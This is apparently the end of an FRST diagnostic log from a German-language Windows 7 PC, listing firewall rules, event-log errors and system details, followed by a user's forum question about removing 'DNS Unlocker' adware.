FirewallRules: [{1B75EAAA-850B-495E-B33B-11EE792B861A}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{4810EF78-A419-472B-83C2-A984D46F0A45}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{E209841A-EAD7-48BF-A32C-16171256B2BE}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
FirewallRules: [{EE245FBD-7B09-4516-A65F-98112C18D269}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
FirewallRules: [{C39A06DD-8B8E-4B76-B572-6843C4A5E418}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{45E9FB0F-2578-4E3B-A99E-D01C3F9E6B8C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{3AB4B367-747D-4F9C-804F-8FAAE655C533}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{3B95664C-65E3-4BF5-9451-4D722331E4F7}] => (Allow) LPort=2869
FirewallRules: [{4E8A21D5-4E9C-4ED4-926B-A82DA60AE973}] => (Allow) LPort=1900
FirewallRules: [{4705FBF4-0593-4D22-8199-94CEDA53A957}] => (Allow) C:\Users\Özkan\AppData\Roaming\Spotify\spotify.exe
FirewallRules: [{C164648D-CE05-4A1E-A788-D034663CDEBF}] => (Allow) C:\Users\Özkan\AppData\Roaming\Spotify\spotify.exe
FirewallRules: [{3FE1533B-F968-442A-B4F5-0C0D9A5FF04C}] => (Allow) C:\ProgramData\NexonEU\NGM\NGM.exe
FirewallRules: [{2285214F-608D-43DE-8C80-3D7C66FC8182}] => (Allow) C:\ProgramData\NexonEU\NGM\NGM.exe
FirewallRules: [{9DF2F638-22A2-46EF-8561-26D2A88308F8}] => (Allow) C:\Nexon\Combat Arms EU\NMService.exe
FirewallRules: [{8595951D-5034-4341-935A-AE3B325BDA5E}] => (Allow) C:\Nexon\Combat Arms EU\NMService.exe
FirewallRules: [{0EC9DAF6-6768-4531-BA4B-FF70797749AF}] => (Allow) C:\Nexon\Combat Arms EU\NMService.exe
FirewallRules: [{DCFCEE64-AD4E-401B-AE64-2A933CC8B06B}] => (Allow) C:\Nexon\Combat Arms EU\NMService.exe
FirewallRules: [{9DBCB308-62B2-43B7-B834-B92F772D5BA2}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{4FF22754-95A5-4C16-96BD-19F379D43BA8}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{4D8AD6F5-E15E-42D7-900E-F5CF7C66F18D}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe
FirewallRules: [{804B76B7-81D0-4E6C-B3B4-FB3FE61D906E}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe
FirewallRules: [{19FE12BD-5FC0-42A9-8DDC-B9341ECE8035}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe
FirewallRules: [{F6026884-630E-4C24-8660-C5E9F3149291}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe
FirewallRules: [{BAF800C1-4858-4E81-AAA1-5780BF1D964C}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe
FirewallRules: [{8CC7783F-D8C9-4A9B-8EB6-41D53FB062EA}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe
FirewallRules: [TCP Query User{940C46C6-246A-46A5-B467-A27182698428}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{4E9D9BF5-3C86-4073-8E64-0AFE455126B7}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [TCP Query User{6B12E4F9-CDC9-43DB-83C4-110775A1D429}C:\program files (x86)\gameforgelive\games\deu_deu\aion\nclauncher.exe] => (Allow) C:\program files (x86)\gameforgelive\games\deu_deu\aion\nclauncher.exe
FirewallRules: [UDP Query User{C2165E93-9A8C-4891-A7D0-4DD9D43D2DEB}C:\program files (x86)\gameforgelive\games\deu_deu\aion\nclauncher.exe] => (Allow) C:\program files (x86)\gameforgelive\games\deu_deu\aion\nclauncher.exe
FirewallRules: [{0266C16B-9DB0-45AB-BDD1-F548726A58D5}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{773C6A1C-230F-452A-93C5-0FC1E4ABA5CB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{AAC0A1FB-6DFC-48E8-B16F-0B4F3298645F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{366A568C-F27E-4DC5-848A-F4B53B92FCFB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{21B94E54-1DD2-4BF8-8F8D-C93DB82A0732}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{8D8D07C1-334E-4BD2-B252-CBCD0B52002F}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [{05A0E04F-8AAF-4A75-BB40-4AFC757DD5FF}] => (Block) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [{C11F5AA4-5B00-4016-A476-CE3CBF976E8D}] => (Block) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{51A23985-93D0-4E0D-8F5C-BF39FFEC4644}C:\users\özkan\documents\bilder\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\bilder\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{4B828C4D-0982-487B-8883-D60F9FA4BAAE}C:\users\özkan\documents\bilder\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\bilder\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{B7255A14-3607-4171-9CD6-F3BDC9B8B9E6}] => (Allow) C:\Users\Özkan\Documents\logs\Downloads\PBPHInstaller.exe
FirewallRules: [{F3B2B4AA-7F9D-474F-95C6-E16EFA8C9AA9}] => (Allow) C:\Users\Özkan\Documents\logs\Downloads\PBPHInstaller.exe
FirewallRules: [{34970EB3-AF92-4064-AEB5-9560FA11B08F}] => (Allow) C:\Users\Özkan\Documents\my games\PB\GameData\ggdllhost.exe
FirewallRules: [{2AC5FFB5-A3F7-4FAB-BC03-C85A8E1644EA}] => (Allow) C:\Users\Özkan\Documents\my games\PB\gamedata\ggdllhost.exe
FirewallRules: [TCP Query User{9E19711D-48FE-4E48-A1B6-3C60ADECE9B5}C:\users\özkan\documents\my games\pb\gamedata\updatemanager.exe] => (Allow) C:\users\özkan\documents\my games\pb\gamedata\updatemanager.exe
FirewallRules: [UDP Query User{97AEAA5A-B3B7-4B54-A56E-89642AC83A9D}C:\users\özkan\documents\my games\pb\gamedata\updatemanager.exe] => (Allow) C:\users\özkan\documents\my games\pb\gamedata\updatemanager.exe
FirewallRules: [{245A956D-8AE0-44ED-94A2-5A64174DBB0D}] => (Allow) C:\Users\Özkan\Documents\my games\PB\gamedata\Apps\PB\PointBlank.exe
FirewallRules: [{EBB5EF62-323E-4338-A3DA-A72903F9C975}] => (Allow) C:\Users\Özkan\Documents\my games\PB\gamedata\Apps\PB\PointBlank.exe
FirewallRules: [TCP Query User{B11EA2A9-155D-44B0-9ACE-908512AA000A}C:\users\özkan\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\özkan\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{00A2042E-C388-4F6C-8920-B20565A77CAF}C:\users\özkan\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\özkan\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{C5C5DA2C-5336-480B-AEF7-C0F37A75F090}C:\nexon\combat arms eu\engine.exe] => (Block) C:\nexon\combat arms eu\engine.exe
FirewallRules: [UDP Query User{3C3BEC0A-FF69-4BE2-A48D-736D61978D94}C:\nexon\combat arms eu\engine.exe] => (Block) C:\nexon\combat arms eu\engine.exe
FirewallRules: [TCP Query User{EDAA3D02-CDD5-48A2-8916-444CC0384F0C}C:\users\özkan\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\özkan\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{2C2A5F9A-68C3-4A9A-85FF-73CB7DB44762}C:\users\özkan\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\özkan\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{6CE5FEB5-A568-4611-8849-0BF6CC500E54}C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{7D7C9632-5344-4D54-B217-A0708A7A0D69}C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{DB391465-5607-4DF5-8EFD-68EC00796E86}] => (Allow) LPort=49167
FirewallRules: [{B70F1942-FCA8-48D6-BC69-5A1656946DE3}] => (Allow) LPort=5000
FirewallRules: [{E746A689-6A3F-43C1-B4DB-417A6A94FFB2}] => (Allow) C:\Program Files (x86)\GameforgeLive\Games\DEU_deu\Elsword\data\x2.exe
FirewallRules: [{CA0FC397-EA45-471B-81B7-D14162A6176F}] => (Allow) C:\Program Files (x86)\GameforgeLive\Games\DEU_deu\Elsword\data\x2.exe
FirewallRules: [TCP Query User{AD6D5770-A47B-400B-80CA-B1C5E921F286}C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{D326B361-0FAC-423D-A8CF-CEF634518F79}C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [TCP Query User{1CA208CC-0E60-4D7A-9F95-D647FFE96F58}C:\program files (x86)\warlord ii\game.bin] => (Allow) C:\program files (x86)\warlord ii\game.bin
FirewallRules: [UDP Query User{B6F84916-7DA1-4560-BF08-B3F6D4B8267C}C:\program files (x86)\warlord ii\game.bin] => (Allow) C:\program files (x86)\warlord ii\game.bin
FirewallRules: [TCP Query User{4CCF479B-249D-4329-827B-06BE36F6F976}C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{B8B3BF25-2D6C-4AE8-8168-93CAC43DA23C}C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{4D37D830-802A-4B82-AE5C-5702D45A013C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe
FirewallRules: [{4547DE26-8CE8-4BE9-8FC6-6CAD6B07F718}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe
FirewallRules: [TCP Query User{01DE63FC-FD42-48D1-8BC1-E3B7F19CB46F}C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{08367BCB-2D3E-4464-9A42-C48FA412F362}C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{F369092F-4781-4874-AC7B-DB4E99FD9FF2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A1FC346F-ED08-43C6-AA21-419E63D1F90D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{22A0AB29-3F15-4578-B976-FF69A53E577F}C:\users\özkan\documents\spiele emre\emre\terraria 1.2.1.2\terrariaserver.exe] => (Allow) C:\users\özkan\documents\spiele emre\emre\terraria 1.2.1.2\terrariaserver.exe
FirewallRules: [UDP Query User{65FE8B49-176E-4AFE-B39E-10FEAC40F603}C:\users\özkan\documents\spiele emre\emre\terraria 1.2.1.2\terrariaserver.exe] => (Allow) C:\users\özkan\documents\spiele emre\emre\terraria 1.2.1.2\terrariaserver.exe
FirewallRules: [TCP Query User{14016099-6DF5-4626-B91A-F0001D41369D}C:\users\özkan\documents\spiele emre\emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{09B65F16-F90A-4E46-9528-E91A99B97B6B}C:\users\özkan\documents\spiele emre\emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{C861E8A0-8C5D-4E5D-A1AF-AEFE85D9DDCB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp.exe
FirewallRules: [{FB66CB97-5B56-4B66-88FE-D7CB13FE2C9E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp.exe
FirewallRules: [{0C478274-2C5D-4403-BC56-C1E8088DDB41}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{805DD0DD-BF67-4E58-8B1E-20B33ACE9025}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5F74B1AE-2578-474A-9698-777F42CCA0AA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A3D912ED-1EDF-4114-AF43-C92F0FE363FD}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{3966C528-4AE3-462C-AEDE-2CC007CF2E37}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
==================== Fehlerhafte Geräte im Gerätemanager =============
Name: BitDefender Firewall NDIS 6 Filter Driver
Description: BitDefender Firewall NDIS 6 Filter Driver
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: BdfNdisf
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (12/21/2015 02:17:53 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005
Error: (12/21/2015 01:58:47 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: steamwebhelper.exe, Version: 3.17.73.86, Zeitstempel: 0x566f1544
Name des fehlerhaften Moduls: libcef.dll, Version: 3.2526.1348.0, Zeitstempel: 0x5643e1a9
Ausnahmecode: 0xc0000005
Fehleroffset: 0x00e2f176
ID des fehlerhaften Prozesses: 0x1194
Startzeit der fehlerhaften Anwendung: 0xsteamwebhelper.exe0
Pfad der fehlerhaften Anwendung: steamwebhelper.exe1
Pfad des fehlerhaften Moduls: steamwebhelper.exe2
Berichtskennung: steamwebhelper.exe3
Error: (12/20/2015 09:17:19 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005
Error: (12/19/2015 08:56:15 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005
Error: (12/19/2015 01:58:43 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm ts3client_win64.exe, Version 3.0.18.2 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.
Prozess-ID: 98c
Startzeit: 01d139c6e1c74cec
Endzeit: 6
Anwendungspfad: C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client\ts3client_win64.exe
Berichts-ID: a39ae032-a5eb-11e5-b7d2-9e2a84b93483
Error: (12/18/2015 08:04:12 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm ts3client_win64.exe, Version 3.0.18.2 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.
Prozess-ID: ad4
Startzeit: 01d139c500347672
Endzeit: 20
Anwendungspfad: C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client\ts3client_win64.exe
Berichts-ID: 188e838d-a5ba-11e5-b7d2-9e2a84b93483
Error: (12/18/2015 02:11:45 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005
Error: (12/17/2015 04:08:55 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005
Error: (12/16/2015 08:22:04 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005
Error: (12/16/2015 02:16:54 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005
Systemfehler:
=============
Error: (12/22/2015 12:33:23 AM) (Source: ipnathlp) (EventID: 31004) (User: )
Description: 0
Error: (12/22/2015 12:31:21 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Automatische WLAN-Konfiguration" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (12/22/2015 12:31:21 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Diagnosesystemhost" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (12/22/2015 12:31:21 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Sitzungs-Manager für Desktopfenster-Manager" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (12/22/2015 12:31:21 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Überwachung verteilter Verknüpfungen (Client)" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (12/22/2015 12:31:21 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Superfetch" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 60000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (12/22/2015 12:31:21 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Programmkompatibilitäts-Assistent-Dienst" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 60000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (12/22/2015 12:31:21 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Netzwerkverbindungen" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 100 Millisekunden durchgeführt: Neustart des Diensts.
Error: (12/22/2015 12:31:21 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Heimnetzgruppen-Listener" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 60000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (12/22/2015 12:31:21 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Offlinedateien" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Celeron(R) CPU B830 @ 1.80GHz
Prozentuale Nutzung des RAM: 34%
Installierter physikalischer RAM: 3932.36 MB
Verfügbarer physikalischer RAM: 2589.12 MB
Summe virtueller Speicher: 7862.93 MB
Verfügbarer virtueller Speicher: 6027.68 MB
==================== Laufwerke ================================
Drive c: () (Fixed) (Total:465.66 GB) (Free:177.99 GB) NTFS
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: BC5E5834)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)
==================== Ende von Addition.txt ============================ Ich wollte es kurz dazu schreiben, bei Steam steht dann meistens unten AD by DNS Unlocker. Wird das dann auch weg sein nach dem ganzen Porzess? Danke das du mir bis hierhin weitergeholfen hast Sandra. |